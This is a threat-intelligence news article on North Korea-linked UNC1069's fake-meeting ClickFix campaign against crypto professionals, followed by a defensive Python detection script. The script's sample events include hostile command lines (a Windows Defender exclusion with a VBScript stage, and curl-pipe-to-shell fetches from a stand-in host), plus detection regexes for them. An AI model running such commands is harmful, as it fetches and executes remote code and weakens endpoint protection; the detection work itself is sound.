
North Korea-Linked UNC1069 Targets Crypto Professionals Through Fake Meetings


UNC1069 Launches Targeted Cyber Campaign Against Cryptocurrency Professionals

In recent cyber threat news, a group linked to North Korea, known as UNC1069, has been observed executing a highly targeted campaign aimed at compromising professionals within the cryptocurrency and Web3 industries. This operation is characterized by its sophisticated use of fake meeting platforms, including Zoom, Google Meet, and Microsoft Teams, to facilitate social engineering and malware deployment aimed at large-scale theft of digital assets.

The overarching objective of the UNC1069 group appears to be securing long-term access to their victims’ systems, thus enabling the theft of valuable digital assets over extended periods. The group employs stealthy tactics, primarily through social engineering techniques that mislead professionals into accepting fraudulent meeting invitations or engaging in conversations that lead to their compromise.

One of the more deceptive methods used in this campaign is the hijacking of legitimate accounts to carry on existing conversations, which lets the attackers arrange “due diligence” or “partnership” calls that appear authentic. The attackers further bolster their credibility by using scheduling tools such as Calendly to set up these meetings. The group has reportedly replicated strategies seen in Bluenoroff/CryptoCore, another North Korean cyber actor, increasing the risk for those in the cryptocurrency space.

Victims often find themselves receiving links to counterfeit meeting portals that are designed to closely resemble well-known platforms like Zoom, Google Meet, and Microsoft Teams. These portals occasionally employ AI-generated or replayed video footage, mimicking earlier victims or impersonated executives, creating an illusion of a live business interaction.

In these impersonated virtual meetings, UNC1069 takes advantage of pretexts involving audio or video issues, or even missing software development kits (SDKs), to coerce users into executing commands or installing what they believe are necessary updates. This strategy highlights a “ClickFix”-style flow, wherein victims are guided, in real time, to open terminal or elevated PowerShell windows, subsequently pasting commands provided by the malicious actors.

For Windows users, these commands initiate multiple PowerShell scripts that fetch and execute hidden VBScript payloads. These scripts are designed to alter Windows Defender settings to allow the attacker’s software to maintain persistence on the victim’s system.

On macOS platforms, victims face a similarly perilous situation, as they are led to execute commands that download malicious software disguised as components of the Zoom platform or other system elements. Such tactics bypass Gatekeeper security measures and facilitate the installation of a backdoor, identified as NukeSped RAT, which is linked to North Korean cyber operations.

Furthermore, in some instances, a Perl-based downloader replaces the initial Mach-O stage while following the same overall flow, so the chain keeps working even when the technique changes. This reflects a significant level of planning and adaptability on the part of UNC1069.

Linux users, too, are not immune from this digital assault. They are coerced into executing scripts that fetch ELF downloaders. This step involves resolving temporary working directories and repeatedly posting data to command-and-control (C2) endpoints, resulting in the execution of secondary malicious payloads that align with the techniques employed on Windows systems.

Beyond merely delivering malware, the phony meeting platforms constructed by UNC1069 also serve as covert surveillance mechanisms. The JavaScript on these pages abuses standard browser media APIs to capture audio and video feeds, enabling the attackers to record sensitive conversations. This material can later be reused to enhance the credibility of future attacks, potentially with AI tooling that generates highly realistic deepfake content.

An extensive analysis of the infrastructure supporting the campaign reveals an intricate web of attacker-controlled domains designed to impersonate legitimate meeting platforms and investment firms. These findings underscore the extensive ecosystem crafted by UNC1069, which enables them to operate under various guises while reusing a common set of technical templates and tools.

Moreover, this operation has shown connections to supply-chain attacks, including the compromise of the Axios npm package. Such activities indicate the group’s adeptness at combining social engineering tactics with malware distribution strategies targeting high-value cryptocurrency entities.

In light of this evolving cyber threat landscape, organizations within the cryptocurrency and Web3 sectors are advised to exercise extreme caution regarding unsolicited outreach and meeting invitations. Practices such as verifying counterparties through out-of-band methods and enforcing strict protocols against executing terminal commands during such calls are recommended. Security teams can enhance their defenses by monitoring for suspicious activities linked to PowerShell, curl commands, and other scripting behaviors emerging from collaboration sessions.
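As an added illustration of the monitoring advice above (this is example code, not from the original article or any named vendor), the following Python triage runs over constructed process-creation events and flags shells or script hosts spawned by meeting clients or browsers, together with command lines showing the Defender tampering, curl-to-shell fetching and VBScript staging the article describes. The parent and child process lists, the regexes and the sample events are all assumptions to be tuned for a real estate.

```python
import re

# Constructed sample process-creation events (EDR/Sysmon style); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Program Files\Zoom\bin\Zoom.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell -c "Add-MpPreference -ExclusionPath $env:TEMP; cscript $env:TEMP\fix.vbs"'},
    {"host": "mac-07", "parent": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
     "image": "/bin/bash", "cmdline": 'bash -c "curl -fsSL http://example.invalid/zoom-fix.sh | bash"'},
    {"host": "lin-03", "parent": "/usr/bin/gnome-terminal", "image": "/bin/sh",
     "cmdline": 'sh -c "curl -s http://example.invalid/setup | sh"'},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]
# Assumed lists: meeting clients and browsers (which host the fake portals) that should not
# spawn a shell or script host during a call, and the script hosts we care about.
MEETING_PARENTS = {"zoom.exe", "zoom.us", "teams.exe", "ms-teams.exe", "microsoft teams",
                   "chrome.exe", "google chrome", "msedge.exe", "firefox.exe", "firefox", "safari"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "bash", "sh", "zsh", "curl", "perl", "osascript"}
# Command-line indicators for the behaviours the article describes (assumed patterns).
CMDLINE_PATTERNS = [
    (re.compile(r"\b(Set|Add)-MpPreference\b", re.I), "defender-settings-change"),  # Defender tampering
    (re.compile(r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b", re.I), "curl-pipe-shell"),        # fetch-and-run
    (re.compile(r"\.vbs\b", re.I), "vbscript-stage"),                               # hidden VBScript stage
]

def basename(path: str) -> str:
    """Lower-cased image name for either a Windows or a POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(event: dict) -> list:
    """Return indicator tags for one event; an empty list means nothing suspicious."""
    tags = []
    parent, child = basename(event["parent"]), basename(event["image"])
    if parent in MEETING_PARENTS and child in SCRIPT_HOSTS:
        tags.append(f"script-host-from-{parent}")
    tags += [tag for pattern, tag in CMDLINE_PATTERNS if pattern.search(event["cmdline"])]
    return tags

def severity(tags: list) -> str:
    """'high' when an anomalous parent and a command-line indicator coincide, else 'medium'."""
    has_parent = any(t.startswith("script-host-from-") for t in tags)
    return "none" if not tags else "high" if has_parent and len(tags) > 1 else "medium"

def triage(events: list) -> list:
    """(host, severity, tags) for every event that raised at least one indicator."""
    return [(ev["host"], severity(t), t) for ev in events if (t := classify(ev))]
```

The explorer-launched backup script is left unflagged to show the baseline; the terminal-launched curl pipe is only medium because no meeting client or browser is the parent.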

Furthermore, organizations are urged to maintain vigilance concerning UNC1069’s infrastructure and malware activities while enforcing least-privilege access processes for their digital wallets. Such proactive measures are crucial in mitigating risks posed by potential account compromises and ensuring the protection of valuable digital assets.
